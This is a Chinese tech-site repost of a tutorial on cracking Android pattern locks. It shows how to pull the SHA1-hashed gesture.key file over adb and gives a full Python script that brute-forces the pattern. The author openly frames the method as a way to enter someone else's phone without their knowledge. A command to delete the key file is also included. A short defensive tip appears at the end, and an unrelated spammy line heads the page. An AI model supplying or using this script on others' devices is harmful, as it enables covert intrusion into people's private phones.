自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

如何破解安卓手機(jī)上的圖形鎖(九宮格鎖)

安全 終端安全
安卓手機(jī)的圖形鎖(九宮格)是3×3的點(diǎn)陣,按次序連接數(shù)個(gè)點(diǎn)從而達(dá)到鎖定/解鎖的功能。最少需要連接4個(gè)點(diǎn),最多能連接9個(gè)點(diǎn)。網(wǎng)上也有暴力刪除手機(jī)圖形鎖的方法,即直接干掉圖形鎖功能。但假如你想進(jìn)入別人的手機(jī),但又不想引起其警覺(jué)的話……你可以參考一下本文。

安卓手機(jī)的圖形鎖(九宮格)是3×3的點(diǎn)陣,按次序連接數(shù)個(gè)點(diǎn)從而達(dá)到鎖定/解鎖的功能。最少需要連接4個(gè)點(diǎn),最多能連接9個(gè)點(diǎn)。網(wǎng)上也有暴力刪除手機(jī)圖形鎖的方法,即直接干掉圖形鎖功能。但假如你想進(jìn)入別人的手機(jī),但又不想引起其警覺(jué)的話……你可以參考一下本文。

如何破解安卓手機(jī)上的圖形鎖(九宮格鎖)

前提條件:手機(jī)需要root,而且打開(kāi)調(diào)試模式。一般來(lái)講,如果用過(guò)諸如“豌豆莢手機(jī)助手”、“360手機(jī)助手”一類的軟件,都會(huì)被要求打開(kāi)調(diào)試模式的。如果要?jiǎng)h除手機(jī)內(nèi)置軟件,則需要將手機(jī)root。

原理分析

首先科普一下,安卓手機(jī)是如何標(biāo)記這9個(gè)點(diǎn)的。通過(guò)閱讀安卓系統(tǒng)源碼可知,每個(gè)點(diǎn)都有其編號(hào),組成了一個(gè)3×3的矩陣,形如:

00 01 02

03 04 05

06 07 08

假如設(shè)定解鎖圖形為一個(gè)“L”形,如圖:

如何破解安卓手機(jī)上的圖形鎖(九宮格鎖)

那么這幾個(gè)點(diǎn)的排列順序是這樣的:00 03 06 07 08。系統(tǒng)就記下來(lái)了這一串?dāng)?shù)字,然后將這一串?dāng)?shù)字(以十六進(jìn)制的方式)進(jìn)行SHA1加密,存儲(chǔ)在了手機(jī)里的/data/system/gesture.key 文件中。我們用數(shù)據(jù)線連接手機(jī)和電腦,然后ADB連接手機(jī),將文件下載到電腦上(命令:adb pull /data/system/gesture.key gesture.key),如圖:

如何破解安卓手機(jī)上的圖形鎖(九宮格鎖)

用WinHex等十六進(jìn)制編輯程序打開(kāi)gesture.key,會(huì)發(fā)現(xiàn)文件內(nèi)是SHA1加密過(guò)的字符串:c8c0b24a15dc8bbfd411427973574695230458f0,如圖:

如何破解安卓手機(jī)上的圖形鎖(九宮格鎖)

當(dāng)你下次解鎖的時(shí)候,系統(tǒng)就對(duì)比你畫(huà)的圖案,看對(duì)應(yīng)的數(shù)字串是不是0003060708對(duì)應(yīng)的加密結(jié)果。如果是,就解鎖;不是就繼續(xù)保持鎖定。那么,如果窮舉所有的數(shù)字串排列,會(huì)有多少呢?聯(lián)想到高中的階乘,如果用4個(gè)點(diǎn)做解鎖圖形的話,就是9x8x7x6=3024種可能性,那5個(gè)點(diǎn)就是15120,6個(gè)點(diǎn)的話60480,7個(gè)點(diǎn)181440,8個(gè)點(diǎn)362880,9個(gè)點(diǎn)362880。總共是985824種可能性(但這么計(jì)算并不嚴(yán)密,因?yàn)橥粭l直線上的點(diǎn)只能和他們相鄰的點(diǎn)相連)。

滿打滿算,也不到985824種可能性。乍一看很大,但在計(jì)算機(jī)面前,窮舉出來(lái)這些東西用不了幾秒鐘。

破解過(guò)程

知道了原理,就著手寫(xiě)程序來(lái)實(shí)現(xiàn)吧。這里使用了Python來(lái)完成任務(wù)。主要應(yīng)用了hashlib模塊(對(duì)字符串進(jìn)行SHA1加密)和itertools模塊(Python內(nèi)置,生成00-09的排列組合)。

主要流程為:

1.ADB連接手機(jī),獲取gesture.key文件

2.讀取key文件,存入字符串str_A

3.生成全部可能的數(shù)字串

4.對(duì)這些數(shù)字串進(jìn)行加密,得到字符串str_B

5.將字符串str_A與str_B進(jìn)行對(duì)比

6.如果字符串A,B相同,則說(shuō)明數(shù)字串num就是想要的解鎖順序

7.打印出數(shù)字串num

下面為程序:

# -*- coding: cp936 -*-import itertools
import hashlib
import time
import os

#調(diào)用cmd,ADB連接到手機(jī),讀取SHA1加密后的字符串
os.system("adb pull /data/system/gesture.key gesture.key")
time.sleep(5)
f=open('gesture.key','r')
pswd=f.readline()
f.close()
pswd_hex=pswd.encode('hex')print '加密后的密碼為:%s'%pswd_hex

#生成解鎖序列,得到['00','01','02','03','04','05','06','07','08']
matrix=[] 
for i in range(0,9):
    str_temp = '0'+str(i)
    matrix.append(str_temp)#將00——08的字符進(jìn)行排列,至少取4個(gè)數(shù)排列,最多全部進(jìn)行排列

min_num=4
max_num=len(matrix)for num in range(min_num,max_num+1):#從04 -> 08
    iter1 = itertools.permutations(matrix,num)#從9個(gè)數(shù)字中挑出n個(gè)進(jìn)行排列
    list_m=[]
    list_m.append(list(iter1))#將生成的排列全部存放到 list_m 列表中
    for el in list_m[0]:#遍歷這n個(gè)數(shù)字的全部排列
        strlist=''.join(el)#將list轉(zhuǎn)換成str。[00,03,06,07,08]-->0003060708
        strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#將字符串進(jìn)行SHA1加密
        if pswd_hex==strlist_sha1:#將手機(jī)文件里的字符串與加密字符串進(jìn)行對(duì)比
            print '解鎖密碼為:',strlist

總結(jié)

從程序本身來(lái)說(shuō),得到解鎖密碼后應(yīng)該用break跳出循環(huán)并終止程序運(yùn)行。但Python并沒(méi)有跳出多重循環(huán)的語(yǔ)句,如果要跳出多重循環(huán),只能設(shè)置標(biāo)志位然后不停進(jìn)行判定。為了運(yùn)行速度就略去了“跳出循環(huán)”這個(gè)步驟。(有沒(méi)有更好的實(shí)現(xiàn)跳出多重循環(huán)的方法?)另外也略去了很多容錯(cuò)語(yǔ)句。從破解目的來(lái)說(shuō),如果單單是忘記了自己的手機(jī)圖形鎖密碼,完全可以用更簡(jiǎn)單的辦法:ADB連接手機(jī),然后“adb rm /data/system/gesture.key”刪除掉gesture.key文件,此時(shí)圖形鎖就失效了,隨意畫(huà)一下就能解鎖。但本文開(kāi)篇假設(shè)的是“為了不被察覺(jué)地進(jìn)入到別人的手機(jī)里”,所以就有了這篇文章。

最后提一個(gè)安全小建議:如果手機(jī)已root,還要用“XX手機(jī)助手”,還想設(shè)置圖形鎖的話——在手機(jī)“設(shè)置”選項(xiàng)里,有一個(gè)“鎖定狀態(tài)下取消USB調(diào)試模式”(這個(gè)名字因手機(jī)而異,而且有的有此選項(xiàng),有的手機(jī)就沒(méi)有),開(kāi)啟此功能之后,在手機(jī)鎖定狀態(tài)下就能夠防范此類攻擊了。此文技術(shù)原理很簡(jiǎn)單,還望各位大大傳授些高大上的Python編程技巧。

責(zé)任編輯:藍(lán)雨淚 來(lái)源: FreeBuf
相關(guān)推薦

2015-01-26 13:22:55

密碼鎖

2011-08-01 13:13:19

iPhone開(kāi)發(fā) 圖片

2019-03-24 15:05:23

手機(jī)安全解鎖

2018-08-14 13:34:30

商業(yè)模式

2013-05-29 10:44:11

2011-11-24 13:37:42

點(diǎn)心桌面

2021-12-31 08:12:05

微信微信支付云閃付

2013-07-30 11:16:33

iOS 7 Beta 九宮格輸入法

2022-04-21 21:49:57

元宇宙

2020-09-16 12:10:19

九宮格視頻Python文件

2011-09-16 10:35:13

Android應(yīng)用數(shù)獨(dú)經(jīng)典游戲

2023-04-20 08:26:17

九宮格布局客戶端

2019-08-06 16:40:33

手機(jī)按鍵屏幕

2012-04-13 16:35:02

傲游手機(jī)瀏覽器發(fā)布

2017-03-29 15:41:45

互聯(lián)網(wǎng)

2013-10-31 11:19:09

微軟語(yǔ)音翻譯手語(yǔ)翻譯

2018-08-08 16:00:57

京東

2022-03-03 18:49:56

HarmonyOS鴻蒙操作系統(tǒng)

2016-12-27 19:19:51

2021-10-12 16:39:39

支付寶口碑移動(dòng)應(yīng)用
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)